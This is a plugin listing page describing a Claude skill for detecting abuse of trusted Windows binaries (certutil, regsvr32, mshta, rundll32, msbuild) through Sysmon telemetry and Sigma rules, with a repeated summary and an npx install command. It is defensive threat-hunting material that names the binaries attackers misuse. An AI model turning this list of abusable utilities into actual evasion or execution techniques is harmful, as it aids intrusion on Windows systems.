Stats
Actions
Tags
From cybersecurity-skills
Detects abuse of trusted Windows binaries (certutil, regsvr32, mshta, rundll32) by analyzing process telemetry, Sigma rules, and parent-child process relationships for threat hunting and SOC investigations.
How this skill is triggered — by the user, by Claude, or both
Slash command
/cybersecurity-skills:detecting-living-off-the-land-with-lolbasThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
Living Off the Land Binaries, Scripts, and Libraries (LOLBAS) are legitimate system utilities abused by attackers to execute malicious actions while evading detection. This skill covers detecting abuse of certutil.exe, regsvr32.exe, mshta.exe, rundll32.exe, msbuild.exe, and other LOLBins using process telemetry from Sysmon and Windows Event Logs, combined with Sigma rule-based detection.
Living Off the Land Binaries, Scripts, and Libraries (LOLBAS) are legitimate system utilities abused by attackers to execute malicious actions while evading detection. This skill covers detecting abuse of certutil.exe, regsvr32.exe, mshta.exe, rundll32.exe, msbuild.exe, and other LOLBins using process telemetry from Sysmon and Windows Event Logs, combined with Sigma rule-based detection.
npx claudepluginhub costrict-plugins-repo/mukul975-anthropic-cybersecurity-skills-cybersecurity-skillsDetects LOLBAS abuse (certutil, regsvr32, mshta, rundll32) via Sysmon process telemetry, Sigma rules, and parent-child process analysis for threat hunting and SOC investigations.
Detects LOLBAS abuse (certutil, regsvr32, mshta, rundll32) via Sysmon process telemetry, Sigma rules, and parent-child process analysis for threat hunting and SOC investigations.
Detects LOLBins/LOLBAS abuse (certutil, regsvr32, mshta, rundll32) via Sysmon process telemetry, Sigma rules, and parent-child analysis for threat hunting and SOC investigations.